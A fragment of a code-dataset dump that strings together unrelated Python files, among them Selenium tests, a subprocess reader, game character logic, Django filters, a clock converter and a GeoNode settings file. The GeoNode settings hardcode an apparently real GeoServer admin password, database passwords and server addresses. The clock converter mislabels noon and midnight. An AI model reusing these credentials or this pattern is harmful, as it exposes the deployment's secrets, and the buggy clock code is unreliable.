time.sleep(2000)\n\n","sub_path":"TemperatureIntoTxtBG.py","file_name":"TemperatureIntoTxtBG.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"275078759","text":"from selenium import webdriver\nfrom time import sleep\nimport os# os 模块为 python 语言标准库中的 os 模块包含普遍的操作系统功能。主要用于操作本地目录文件。\ndriver=webdriver.Chrome()\ndriver.maximize_window()\n# 打开本地网页\n# path.abspath()方法用于获取当前路径下的文件。另外脚本中还使用到 for 循环,对 inputs 获取的一组元素\nfile_path = 'file:///' + os.path.abspath('checkbox.html')\ndriver.get(file_path)\ndriver.implicitly_wait(5)\n# 选择页面上所有的 tag name 为 input 的元素\ninputs = driver.find_elements_by_tag_name('input')\n\n\n#然后从中过滤出 tpye 为 checkbox 的元素,单击勾选\n# 进行循环,在 python 语言中循环变量(input)可以不用事先声明直接使用。\nfor input in inputs:\n if input.get_attribute('type') == 'checkbox':\n input.click()\n\n\n# 打印当前页面上 type 为 checkbox 的个数\n# len 为 python 语言中的方法,用于返回一个对象的长度(或个数)。\n# 选择所有的 type 为 checkbox 的元素\nprint(len(driver.find_elements_by_css_selector('input[type=checkbox]')))\n\n# pop 也为 python 语言中提供的方法,用于删除指定们位置的元素,pop()为空默认选择最一个元素。\n# 把页面上最后1个 checkbox 的勾给去掉\ndriver.find_elements_by_css_selector('#c3').pop().click()\nsleep(3)\n# 把页面上第一个1个 checkbox 的勾给去掉\ndriver.find_elements_by_xpath('//*[@id=\"c1\"]').pop().click()\nsleep(2)\ndriver.quit()\n\n\n","sub_path":"定位一组元素/定位一组元素checkbox.py","file_name":"定位一组元素checkbox.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"288652314","text":"from queue import Queue\nfrom threading import Thread\n\nimport subprocess\n\n\nclass RealTimeSubprocess(subprocess.Popen):\n \"\"\"\n A subprocess that allows to read its stdout and stderr in real time\n\n Parameters\n ==========\n\n cmd\n The command to execute\n write_to_stdout : callable\n Called when chunks of data from stdout are ready.\n write_to_stderr : callable\n Called when chinks of data from stderr are ready.\n\n \"\"\"\n def __init__(self, cmd, write_to_stdout, write_to_stderr):\n self._write_to_stdout = write_to_stdout\n self._write_to_stderr = write_to_stderr\n\n super().__init__(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)\n\n self._stdout_queue = Queue()\n self._stdout_thread = Thread(\n target=RealTimeSubprocess._enqueue_output,\n args=(self.stdout, self._stdout_queue))\n self._stdout_thread.daemon = True\n self._stdout_thread.start()\n\n self._stderr_queue = Queue()\n self._stderr_thread = Thread(\n target=RealTimeSubprocess._enqueue_output,\n args=(self.stderr, self._stderr_queue))\n self._stderr_thread.daemon = True\n self._stderr_thread.start()\n\n @staticmethod\n def _enqueue_output(stream, queue):\n \"\"\"\n Add chunks of data from a stream to a queue until the stream is empty.\n \"\"\"\n for line in iter(lambda: stream.read(4096), b''):\n queue.put(line)\n stream.close()\n\n def write_contents(self):\n \"\"\"\n Write the available content from stdin and stderr to the\n appropriate destinations.\n\n \"\"\"\n def read_all_from_queue(queue):\n res = b''\n size = queue.qsize()\n while size != 0:\n res += queue.get_nowait()\n size -= 1\n return res\n\n stdout_contents = read_all_from_queue(self._stdout_queue)\n if stdout_contents:\n self._write_to_stdout(stdout_contents)\n stderr_contents = read_all_from_queue(self._stderr_queue)\n if stderr_contents:\n 
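upload_data_api() in the temperature record calls requests.post and json.dumps, but the script only imports time and datetime, so the first reading raises NameError; `import json` and `import requests` are the missing lines (requests is a third-party package). Separately, pulling the reading out of a DS18B20 w1_slave dump is more robust with a regex than with the fixed split positions used in recupTemp; the sample string below is illustrative:

import re

def recup_temp(contents):
    # The temperature is the signed integer after "t=" on the second line,
    # in thousandths of a degree Celsius.
    match = re.search(r"t=(-?\d+)", contents)
    if match is None:
        raise ValueError("no temperature found in w1_slave output")
    return int(match.group(1)) / 1000.0

sample = ("50 05 4b 46 7f ff 0c 10 1c : crc=1c YES\n"
          "50 05 4b 46 7f ff 0c 10 1c t=23125")
print(recup_temp(sample))   # 23.125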
self._write_to_stderr(stderr_contents)\n","sub_path":"jfk_fling/realtime_subprocess.py","file_name":"realtime_subprocess.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222584677","text":"import os\nimport numpy as np\nimport subprocess\nimport pdb\nimport shutil\nimport time\n\ndef create_ndx(name, gro_file, gmxhome, gmxbin, gmxlib):\n\n subprocess.call(['touch', 'RunNDX.sh'])\n file = open('./RunTLEAP.sh','w')\n file.write(\"gmx make_ndx -f npt.gro -o PLCg1.ndx\\n\")\n file.write('gmx make_ndx -f npt.gro -o PLCg1.ndx\\n')\n file.close()\n\n\ndef main():\n # run this code only after the crystalographic water is removed and only a single system is present in\n # the .pdb file (sometimes the crystal contains multiple copies of the protein)\n\n # in the section below the gromacs files are defined\n # -------------------------------------------------------------------------------------------------\n system_name = 'PLCpep7'\n gmxhome = '/usr/local/gromacs'\n binhome = os.path.join(gmxhome, 'bin')\n gmxbin = os.path.join(binhome,'gmx')\n gmxlib = os.path.join(gmxhome,'share/gromacs/top/')\n # -------------------------------------------------------------------------------------------------\n\n gro_file = 'npt.gro'\n subprocess.call(['cp', 'npt.gro', system_name + '_equi.gro' ])\n\n create_ndx(system_name, gro_file, gmxhome, gmxbin, gmxlib)\n\nif __name__ == '__main__':\n main()\n","sub_path":"create_ndx.py","file_name":"create_ndx.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"216903513","text":"from d20.inventory import Inventory\nfrom d20.classes import Class\nfrom d20.dice import Dice\nfrom d20.signals import onDamage, onHeal\nfrom d20.powers import Power\nfrom sgl.core import xml\n\nclass _Meta(object):pass\n\nclass CharacterBase(object):\n\tdef __init__(self):\n\t\tself._first_class_applied = False\n\t\tself.name = ''\n\t\tself.level = 0\n\t\tself.classes = {} # Class and level\n\t\tself.powers = []\n\t\tself.feats = []\n\t\t\n\t\tself.hp = 0\n\t\tself.healing_surges = 0\n\t\t\n\t\tself.speed = 6\n\t\t\n\t\tself.stats = {\n\t\t\t'str':8,\n\t\t\t'dex':8,\n\t\t\t'con':8,\n\t\t\t'int':8,\n\t\t\t'wis':8,\n\t\t\t'cha':8,\n\t\t}\n\t\t\n\t\tself.saves = {\n\t\t\t'ac':10,\n\t\t\t'reflex':10,\n\t\t\t'fortitude':10,\n\t\t\t'will':10,\n\t\t}\n\t\t\n\tdef __getstate__(self):\n\t\td = self.__dict__.copy()\n\t\td['powers'] = [obj.name for obj in d['powers']]\n\t\treturn d\n\t\t\n\tdef __setstate__(self, st):\n\t\tself.__dict__.update(st)\n\t\tself.powers = [Power(obj) for obj in self.powers]\n\t\t\n\t\"\"\"\n\tdef __str__(self):\n\t\treturn self.name\n\t\t\n\tdef __repr__(self):\n\t\treturn '<%s: %s>' % (self.__class__.name, self.name)\n\t\"\"\"\n\t\t\n\tdef load(self, x):\n\t\tx.query(self, 'name')\n\t\t\n\t\txAbil = x.find('abilities')\n\t\tif xAbil is not None:\n\t\t\tfor k in self.stats.keys():\n\t\t\t\ttry:\n\t\t\t\t\tself.stats[k] = int(xAbil.get(k))\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\t\t\n\t\tfor xPath in x.findall('path'):\n\t\t\tcls = xPath.get('class')\n\t\t\tlvl = xPath.get('level')\n\t\t\tif cls and lvl:\n\t\t\t\tself.apply_class(cls, lvl)\n\t\t\t\t\n\t\tself.level = sum(self.classes.values())\n\t\t\n\t\t#log('Loaded %s: %s' % (self.name, self.__dict__))\n\t\t\n\tdef apply_class(self, cls, lvl):\n\t\tlvl = int(lvl)\n\t\tif lvl < 1:\n\t\t\treturn\n\t\tself.classes[cls] = 
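A minimal usage sketch for the RealTimeSubprocess class above. poll() is inherited from subprocess.Popen and write_contents() is defined in the record; the import path is taken from the record's own module path (jfk_fling/realtime_subprocess.py) and assumes that package is importable, and the command and callbacks are illustrative:

import sys
import time

from jfk_fling.realtime_subprocess import RealTimeSubprocess

def to_stdout(chunk):
    sys.stdout.write(chunk.decode(errors="replace"))

def to_stderr(chunk):
    sys.stderr.write(chunk.decode(errors="replace"))

proc = RealTimeSubprocess([sys.executable, "-c", "print('hello')"],
                          to_stdout, to_stderr)
while proc.poll() is None:   # still running
    proc.write_contents()    # flush whatever the reader threads have queued
    time.sleep(0.1)
proc.write_contents()        # drain anything that arrived after exit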
lvl\n\t\t\n\t\tcls = Class(cls)\n\t\t\n\t\t# Apply base values if not set\n\t\tif not self._first_class_applied:\n\t\t\tself._first_class_applied = True\n\t\t\tself.hp = cls.hp_first_level + cls.hp_per_level * (lvl - 1)\n\t\t\tself.healing_surges = cls.healing_surges\n\t\telse:\n\t\t\t# Otherwise just add HP\n\t\t\tself.hp += cls.hp_per_level * lvl\n\t\t\t\n\t\t# Add Defenses\n\t\tself.saves['fortitude'] += cls.fortitude\n\t\tself.saves['reflex'] += cls.reflex\n\t\tself.saves['will'] += cls.will\n\t\t\n\t\t# Add Feats\n\t\tself.feats = list(set(self.feats + cls.feats))\n\t\t\n\t\t# Add free powers\n\t\tif 0 in cls.powers:\n\t\t\tself.powers = list(set(self.powers + cls.powers[0]))\n\t\t\t\n\t\t# FIXME: remove this, only here for testing\n\t\tfor lvl, powers in cls.powers.items():\n\t\t\tif lvl == 0:\n\t\t\t\tcontinue\n\t\t\tself.powers = list(set(self.powers + powers))\n\n\t\t\n\tdef save(self, x):\n\t\tpass\n\t\t\n\tdef calculate_stats(self):\n\t\t# TODO: calculate all possible stats based on current class levels (ex. saves, free feats, free powers)\n\t\tpass\n\t\t\n\tdef validate(self):\n\t\t# TODO: ensure that chose abilities, feats, powers, and stats are valid for this level/class\n\t\tpass\n\t\t\n\tdef mod(self, attr):\n\t\treturn int((self.stats[attr.lower()] - 10) // 2)\n\nclass Character(object):\n\tdef __init__(self, filename = None):\n\t\tself.base = CharacterBase()\n\t\tself.inventory = Inventory()\n\t\tself.meta = _Meta()\n\t\t\n\t\tself.reset()\n\t\t\n\t\tif filename:\n\t\t\tself.load(filename)\n\t\t\n\tdef load(self, x):\n\t\tx = xml.read(x)\n\t\tself.base = CharacterBase()\n\t\tself.inventory = Inventory()\n\t\t\n\t\tself.base.load(x)\n\t\t\n\t\txEquip = x.find('equipment')\n\t\tif xEquip is not None:\n\t\t\tself.inventory.load(xEquip)\n\t\t\t\n\t\tself.reset()\n\t\t\n\tdef reset(self):\n\t\tself.hp = self.base.hp\n\t\tself.temp_hp = 0\n\t\tself.healing_surges = self.base.healing_surges\n\t\t\n\t\tself.saves = self.base.saves.copy()\n\t\t\n\t\tself.powers = self.base.powers\n\t\tself.powers.sort()\n\t\tself.feats = self.base.feats\n\t\t\n\t\tself.speed = self.base.speed\n\t\t\n\t\t\n\t\t# FIXME: some of this can be moved up into Base\n\t\t\n\t\t# Apply stat-based modifiers\n\t\tself.hp += self.base.stats['con']\n\t\tself.healing_surges += self.mod('con')\n\t\t\n\t\t# FIXME: AC should depend on armor\n\t\tself.saves['ac'] += max(self.mod('dex'), self.mod('int'))\n\t\t\n\t\tself.saves['fortitude'] += max(self.mod('con'), self.mod('str'))\n\t\tself.saves['reflex'] += max(self.mod('dex'), self.mod('int')) # TODO: add shield bonus\n\t\tself.saves['will'] += max(self.mod('wis'), self.mod('cha'))\n\t\t\n\t\t#log('%s is ready: %s' % (self.base.name, self.__dict__), type='d20')\n\t\t\n\t@property\n\tdef default_weapon(self):\n\t\treturn self.inventory.right_hand or self.inventory.left_hand\n\n\tdef mod(self, attr):\n\t\treturn int((self.base.stats[attr.lower()] - 10) // 2)\n\t\t\n\tdef is_proficient_with(self, weapon):\n\t\treturn False\n\t\t\n\tdef attack(self, target, atk, defense, weapon=None):\n\t\t\"\"\" Usage: char.attack(target, 'int', 'reflex') \"\"\"\n\t\tdf = target.saves[defense]\n\t\tbonus = self.base.level // 2\n\t\t\n\t\tif weapon and self.is_proficient_with(weapon):\n\t\t\tbonus += weapon.prof\n\t\t\t\n\t\tr = Dice('d20', mod=atk, bonus=bonus).roll(self)\n\t\t\t\n\t\tlog('%s vs %s; %s vs %s' % (atk, defense, r, df), type='d20')\n\t\t\n\t\treturn r >= df\n\t\t\n\tdef heal(self, value, source=None):\n\t\tvalue = int(value)\n\t\tself.hp += 
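mod() in the character record implements the standard d20 ability modifier, (score - 10) // 2. Floor division is the load-bearing detail: for odd scores below 10, rounding toward zero would give the wrong modifier. A quick check:

for score in (8, 9, 10, 11, 14, 18):
    print(score, (score - 10) // 2)
# 8 -> -1, 9 -> -1, 10 -> 0, 11 -> 0, 14 -> 2, 18 -> 4
# With true division, int((9 - 10) / 2) == 0, not the -1 the d20 table expects.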
value\n\t\t\n\t\tonHeal.emit(self, value, source)\n\t\t\n\t\tlog('%s healed for %s hp' % (self.base.name or 'Creature', value), type='d20')\n\t\t\n\tdef damage(self, value, type=None, source=None):\n\t\tvalue = int(value)\n\t\tself.hp -= value\n\t\t\n\t\tonDamage.emit(self, value, type, source)\n\t\t\n\t\tlog('%s takes %s %s damage' % (self.base.name or 'Creature', value, type or 'normal'), type='d20')\n","sub_path":"d20/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"271844263","text":"#-*- coding: utf-8 -*-\n\nfrom django import template\nfrom django.template.defaultfilters import stringfilter\nfrom django.contrib.auth.models import User\nfrom profiles.models import *\nregister = template.Library()\n\n@register.filter\ndef modulo(value1, value2):\n return value1 % value2\n\n@register.filter\ndef size(array):\n\ttry:\n\t\treturn array.count()\n\texcept:\n\t\treturn len(array)\n\n@register.filter\ndef cutText(text):\n if len(text) > 15:\n return text[0:20] + \" ...\"\n\n return text[0:20]\n\n@register.filter\ndef imageUrl(element):\n\treturn element['images']['low_resolution']['url']\n\n############################\n# 0 = Yıl Farklı #\n# 1 = Ay Farklı #\n# 2 = Gün Farklı #\n# 3 = Yıl, Ay, Gün Aynı #\n############################\n\n@register.filter\ndef historyComparison(all_history, index):\n\n\tif index == 0:\n\t\treturn 0 \n\telse:\n\t\tcurrent_history = all_history[index]\n\t\tprevious_history = all_history[index-1]\n\n\t\tif current_history.adding_date.year != previous_history.adding_date.year:\n\t\t\treturn 0\n\t\telif current_history.adding_date.month != previous_history.adding_date.month:\n\t\t\treturn 1\n\t\telif current_history.adding_date.day != previous_history.adding_date.day:\n\t\t\treturn 2\n\t\telse:\n\t\t\treturn 3\n\n\n@register.filter\ndef monthPrev(month_number):\n month_information = {\n \t\"1\":u\"Ocak\", \"2\":u\"Şubat\", \"3\":u\"Mart\", \"4\":\"Nisan\", \n \"5\":u\"Mayıs\", \"6\":u\"Haziran\", \"7\":u\"Temmuz\", \"8\":u\"Ağustos\", \n \"9\":\"Eylül\", \"10\":u\"Ekim\",\"11\":u\"Kasım\", \"12\":u\"Aralık\"\n }\n\n return month_information[str(month_number)] \n\n@register.filter\ndef historyPrev(history):\n\thour = str(history.adding_date.hour) + \":\" + str(history.adding_date.minute)\n\n\treturn hour + \" \" + history.history_searchWord\n \n\n\t\n\n\n","sub_path":"profiles/templatetags/profiles_extra.py","file_name":"profiles_extra.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"435558849","text":"# encoding: utf-8\n\"\"\"\n@version: ??\n@author: chenyitao\n@license: Apache Licence \n@software: PyCharm\n@file: zb_protocol_base.py\n@time: 2018/4/13 12:10\n\"\"\"\nimport json\nimport logging\n\nfrom ..base_protocol import WSProtocolBase\n\nlog = logging.getLogger(__name__)\n\n\nclass ZBWSProtocolBase(WSProtocolBase):\n\n platform = 'zb'\n\n def start(self):\n raise NotImplementedError\n\n def _start(self):\n if self.pairs:\n pairs = list(self.pairs)\n self.src_currency_pairs = pairs\n self.req_currency_pairs = [pair.replace('_', '') + '_ticker' for pair in pairs]\n self.start()\n return\n self.sendMessage('{\"event\": \"addChannel\", \"channel\": \"markets\"}')\n\n def message(self, data):\n raise NotImplementedError\n\n def _message(self, payload, isBinary):\n result = json.loads(payload)\n if result.get('channel') == 
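The size filter in profiles_extra.py tries QuerySet.count() and falls back to len(), but its bare `except:` would also swallow unrelated errors. A plain-Python sketch of the same duck-typing idea with a narrowed except clause (the sample list is illustrative):

def size(collection):
    try:
        # Django QuerySets answer .count() with a single COUNT(*) query.
        return collection.count()
    except (AttributeError, TypeError):
        # Lists and tuples: list.count exists but needs an argument, so the
        # call above raises TypeError and we fall back to len().
        return len(collection)

print(size([1, 2, 3]))   # 3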
'markets':\n self.update_currency_pairs(result)\n return\n self.message(result)\n\n def update_currency_pairs(self, data):\n currency_pairs = data.get('data').keys()\n self.set_pairs(*currency_pairs)\n self._start()\n","sub_path":"worker/extern_modules/zb/zb_protocol_base.py","file_name":"zb_protocol_base.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"388345106","text":"#Autor: Víctor Manuel Rodríguez Loyola\r\n#Conversión de una hora dada en formato de 24 horas al formato de 12 horas\r\n\r\n\r\ndef ConvertirA12Horas(horas, minutos, segundos): #Convierte las hora ingresada por el usuario a formato de 12 horas.\r\n if horas==0:\r\n return 12, 'pm'\r\n\r\n if horas >0 and horas <12:\r\n return horas, 'am'\r\n else:\r\n horasEn12Horas = horas - 12\r\n return horasEn12Horas, 'pm'\r\n\r\n\r\ndef main():\r\n horasEn24Hrs=int(input(\"Teclea las horas: \"))\r\n minutosEn24Hrs= int(input(\"Teclea los minutos: \"))\r\n segundosEn24Hrs=int(input(\"Teclea los segundos: \"))\r\n horaEn12Hrs= ConvertirA12Horas(horasEn24Hrs, minutosEn24Hrs, segundosEn24Hrs)\r\n\r\n if horasEn24Hrs <0 or horasEn24Hrs >23 or minutosEn24Hrs <0 or minutosEn24Hrs >60 or segundosEn24Hrs<0 or minutosEn24Hrs>60:\r\n print(\"Error. Inténtalo de nuevo\")\r\n else:\r\n print(\"La hora en formato de 12 horas es: %d:%02d:%02d %s.\" %(horaEn12Hrs[0],minutosEn24Hrs,segundosEn24Hrs,horaEn12Hrs[1]))\r\n\r\n\r\nmain()\r\n","sub_path":"Reloj.py","file_name":"Reloj.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"295208206","text":"# -*- coding: utf-8 -*-\n#########################################################################\n#\n# Copyright (C) 2018 OSGeo\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n#########################################################################\n\n\"\"\" There are 3 ways to override GeoNode settings:\n 1. Using environment variables, if your changes to GeoNode are minimal.\n 2. Creating a downstream project, if you are doing a lot of customization.\n 3. 
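ConvertirA12Horas in the Reloj.py record mislabels both boundary hours: 0 h (midnight) comes back as "12 pm" and 12 h (noon) falls through to the else branch and comes back as "0 pm"; the input validation also checks the minutes twice and never the seconds. A corrected sketch of the hour conversion:

def convertir_a_12_horas(horas):
    if horas == 0:
        return 12, "am"     # midnight
    if horas < 12:
        return horas, "am"
    if horas == 12:
        return 12, "pm"     # noon
    return horas - 12, "pm"

for h in (0, 1, 11, 12, 13, 23):
    print(h, convertir_a_12_horas(h))
# 0 -> (12, 'am'), 12 -> (12, 'pm'), 13 -> (1, 'pm'), 23 -> (11, 'pm')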
Override settings in a local_settings.py file, legacy.\n\"\"\"\n\nimport ast\nimport os\nfrom urlparse import urlparse, urlunparse\nfrom geonode.settings import *\n\nPROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))\n\nMEDIA_ROOT = os.getenv('MEDIA_ROOT', os.path.join(PROJECT_ROOT, \"uploaded\"))\n\nSTATIC_ROOT = os.getenv('STATIC_ROOT',\n os.path.join(PROJECT_ROOT, \"static_root\")\n )\n\n# SECRET_KEY = '************************'\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = os.getenv('SECRET_KEY', \"{{ secret_key }}\")\n\n\n# per-deployment settings should go here\nSITE_HOST_NAME = os.getenv('SITE_HOST_NAME', 'localhost')\nSITE_HOST_PORT = os.getenv('SITE_HOST_PORT', \"80\")\n\n\n#SITEURL = os.getenv('SITEURL', \"http://%s:%s/\" % (SITE_HOST_NAME, SITE_HOST_PORT))\n\nSITEURL = 'https://geoportal.ermis-f.eu'\n\nSTATIC_ROOT = os.getenv('STATIC_ROOT',\n os.path.join(\"/home/geonode/ermis/ermis\", \"static_root\")\n )\n\n\n# we need hostname for deployed\n_surl = urlparse(SITEURL)\nHOSTNAME = _surl.hostname\n\n\n# add trailing slash to site url. geoserver url will be relative to this\nif not SITEURL.endswith('/'):\n SITEURL = '{}/'.format(SITEURL)\n\nALLOWED_HOSTS = [HOSTNAME, 'localhost','geoportal.ermis-f.eu','kb.ermis-f.eu','84.205.200.65','84.205.200.65:80','195.251.137.130','195.251.137.90','::1']\nPROXY_ALLOWED_HOSTS = (\"127.0.0.1\",'geoportal.ermis-f.eu','kb.ermis-f.eu','84.205.200.65','84.205.200.65:80','195.251.137.130','195.251.137.90','nominatim.openstreetmap.org','b.tile.openstreetmap.org', 'localhost', '::1')\n\nPOSTGIS_VERSION = (2, 0, 7)\n#Define email service on GeoNode\nEMAIL_ENABLE = False\n\nif EMAIL_ENABLE:\n EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n EMAIL_HOST = 'localhost'\n EMAIL_PORT = 25\n EMAIL_HOST_USER = ''\n EMAIL_HOST_PASSWORD = ''\n EMAIL_USE_TLS = False\n DEFAULT_FROM_EMAIL = '{{ project_name }} '\n\nTIME_ZONE = 'Europe/Athens'#'UTC'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'geonode',\n 'USER': 'geonode',\n 'PASSWORD': 'geonode',\n 'HOST': 'localhost',\n 'PORT': '5432',\n 'CONN_TOUT': 900,\n },\n # vector datastore for uploads\n 'datastore': {\n 'ENGINE': 'django.contrib.gis.db.backends.postgis',\n # 'ENGINE': '', # Empty ENGINE name disables\n 'NAME': 'geonode_data',\n 'USER': 'geonode',\n 'PASSWORD': 'geonode',\n 'HOST': 'localhost',\n 'PORT': '5432',\n 'CONN_TOUT': 900,\n }\n}\n\nGEOSERVER_LOCATION = os.getenv(\n 'GEOSERVER_LOCATION', 'https://geoportal.ermis-f.eu/geoserver/'\n)\n\nGEOSERVER_PUBLIC_HOST = os.getenv(\n 'GEOSERVER_PUBLIC_HOST', SITE_HOST_NAME\n)\n\nGEOSERVER_PUBLIC_PORT = os.getenv(\n 'GEOSERVER_PUBLIC_PORT', 80\n)\n\nGEOSERVER_PUBLIC_LOCATION = os.getenv(\n # 'GEOSERVER_PUBLIC_LOCATION', 'http://{}:{}/geoserver/'.format(GEOSERVER_PUBLIC_HOST, GEOSERVER_PUBLIC_PORT)\n\t'GEOSERVER_PUBLIC_LOCATION', 'https://geoportal.ermis-f.eu/geoserver/'\n)\n\nOGC_SERVER_DEFAULT_USER = os.getenv(\n 'GEOSERVER_ADMIN_USER', 'admin'\n)\n\nOGC_SERVER_DEFAULT_PASSWORD = os.getenv(\n 'GEOSERVER_ADMIN_PASSWORD', 'erm_F2018'\n)\n\n# OGC (WMS/WFS/WCS) Server Settings\nOGC_SERVER = {\n 'default': {\n 'BACKEND': 'geonode.geoserver',\n 'LOCATION': GEOSERVER_LOCATION,\n 'LOGIN_ENDPOINT': 'j_spring_oauth2_geonode_login',\n 'LOGOUT_ENDPOINT': 'j_spring_oauth2_geonode_logout',\n # PUBLIC_LOCATION needs to be kept like this because in dev mode\n # the proxy won't work and the integration tests will fail\n # the entire block has to be overridden in the local_settings\n 
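The settings record derives HOSTNAME with urlparse and then forces a trailing slash on SITEURL so service URLs can be joined onto it. The same two steps in isolation, written with the Python 3 import (the file itself uses the Python 2 `from urlparse import urlparse`):

from urllib.parse import urlparse  # 'from urlparse import urlparse' on Python 2

SITEURL = "https://geoportal.ermis-f.eu"
HOSTNAME = urlparse(SITEURL).hostname      # 'geoportal.ermis-f.eu'
if not SITEURL.endswith("/"):
    SITEURL = "{}/".format(SITEURL)        # relative service URLs join cleanly
print(HOSTNAME, SITEURL)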
'PUBLIC_LOCATION': GEOSERVER_PUBLIC_LOCATION,\n 'USER': OGC_SERVER_DEFAULT_USER,\n 'PASSWORD': OGC_SERVER_DEFAULT_PASSWORD,\n 'MAPFISH_PRINT_ENABLED': True,\n 'PRINT_NG_ENABLED': True,\n 'GEONODE_SECURITY_ENABLED': True,\n 'GEOFENCE_SECURITY_ENABLED': True,\n 'GEOGIG_ENABLED': False,\n 'WMST_ENABLED': False,\n 'BACKEND_WRITE_ENABLED': True,\n 'WPS_ENABLED': False,\n 'LOG_FILE': '%s/geoserver/data/logs/geoserver.log' % os.path.abspath(os.path.join(PROJECT_ROOT, os.pardir)),\n # Set to dictionary identifier of database containing spatial data in DATABASES dictionary to enable\n 'DATASTORE': 'datastore',\n 'PG_GEOGIG': False,\n 'TIMEOUT': 60 # number of seconds to allow for HTTP requests\n }\n}\n\n# WARNING: Map Editing is affected by this. GeoExt Configuration is cached for 5 minutes\n# CACHES = {\n# 'default': {\n# 'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',\n# 'LOCATION': '/var/tmp/django_cache',\n# }\n# }\n\n# If you want to enable Mosaics use the following configuration\nUPLOADER = {\n #'BACKEND': 'geonode.rest',\n 'BACKEND': 'geonode.importer',\n 'OPTIONS': {\n 'TIME_ENABLED': True,\n 'MOSAIC_ENABLED': False,\n 'GEOGIG_ENABLED': False,\n },\n 'SUPPORTED_CRS': [\n 'EPSG:4326',\n 'EPSG:3785',\n 'EPSG:3857',\n 'EPSG:32647',\n 'EPSG:32736',\n\t'EPSG:2100'\n ],\n 'SUPPORTED_EXT': [\n '.shp',\n '.csv',\n '.kml',\n '.kmz',\n '.json',\n '.geojson',\n '.tif',\n '.tiff',\n '.geotiff',\n '.gml',\n '.xml'\n ]\n}\n\nCATALOGUE = {\n 'default': {\n # The underlying CSW implementation\n # default is pycsw in local mode (tied directly to GeoNode Django DB)\n 'ENGINE': 'geonode.catalogue.backends.pycsw_local',\n # pycsw in non-local mode\n # 'ENGINE': 'geonode.catalogue.backends.pycsw_http',\n # GeoNetwork opensource\n # 'ENGINE': 'geonode.catalogue.backends.geonetwork',\n # deegree and others\n # 'ENGINE': 'geonode.catalogue.backends.generic',\n\n # The FULLY QUALIFIED base url to the CSW instance for this GeoNode\n 'URL': '%scatalogue/csw' % SITEURL,\n # 'URL': 'http://localhost:8080/geonetwork/srv/en/csw',\n # 'URL': 'http://localhost:8080/deegree-csw-demo-3.0.4/services',\n\n # login credentials (for GeoNetwork)\n 'USER': 'admin',\n 'PASSWORD': 'admin',\n 'ALTERNATES_ONLY': True,\n }\n}\n\n# pycsw settings\nPYCSW = {\n # pycsw configuration\n 'CONFIGURATION': {\n # uncomment / adjust to override server config system defaults\n # 'server': {\n # 'maxrecords': '10',\n # 'pretty_print': 'true',\n # 'federatedcatalogues': 'http://catalog.data.gov/csw'\n # },\n 'metadata:main': {\n 'identification_title': 'GeoNode Catalogue',\n 'identification_abstract': 'GeoNode is an open source platform' \\\n ' that facilitates the creation, sharing, and collaborative use' \\\n ' of geospatial data',\n 'identification_keywords': 'sdi, catalogue, discovery, metadata,' \\\n ' GeoNode',\n 'identification_keywords_type': 'theme',\n 'identification_fees': 'None',\n 'identification_accessconstraints': 'None',\n 'provider_name': 'Organization Name',\n 'provider_url': SITEURL,\n 'contact_name': 'Lastname, Firstname',\n 'contact_position': 'Position Title',\n 'contact_address': 'Mailing Address',\n 'contact_city': 'City',\n 'contact_stateorprovince': 'Administrative Area',\n 'contact_postalcode': 'Zip or Postal Code',\n 'contact_country': 'Country',\n 'contact_phone': '+xx-xxx-xxx-xxxx',\n 'contact_fax': '+xx-xxx-xxx-xxxx',\n 'contact_email': 'Email Address',\n 'contact_url': 'Contact URL',\n 'contact_hours': 'Hours of Service',\n 'contact_instructions': 'During hours of service. 
Off on ' \\\n 'weekends.',\n 'contact_role': 'pointOfContact',\n },\n 'metadata:inspire': {\n 'enabled': 'true',\n 'languages_supported': 'eng,gre',\n 'default_language': 'eng',\n 'date': 'YYYY-MM-DD',\n 'gemet_keywords': 'Utility and governmental services',\n 'conformity_service': 'notEvaluated',\n 'contact_name': 'Organization Name',\n 'contact_email': 'Email Address',\n 'temp_extent': 'YYYY-MM-DD/YYYY-MM-DD',\n }\n }\n}\n\n# GeoNode javascript client configuration\n\n# default map projection\n# Note: If set to EPSG:4326, then only EPSG:4326 basemaps will work.\nDEFAULT_MAP_CRS = \"EPSG:3857\"\n#DEFAULT_MAP_CRS= \"EPSG:2100\"\n\nDEFAULT_LAYER_FORMAT = \"image/png8\"\n\n# Where should newly created maps be focused?\nDEFAULT_MAP_CENTER = (28,38)\n\n# How tightly zoomed should newly created maps be?\n# 0 = entire world;\n# maximum zoom is between 12 and 15 (for Google Maps, coverage varies by area)\nDEFAULT_MAP_ZOOM = 6\n\n# Default preview library\n# 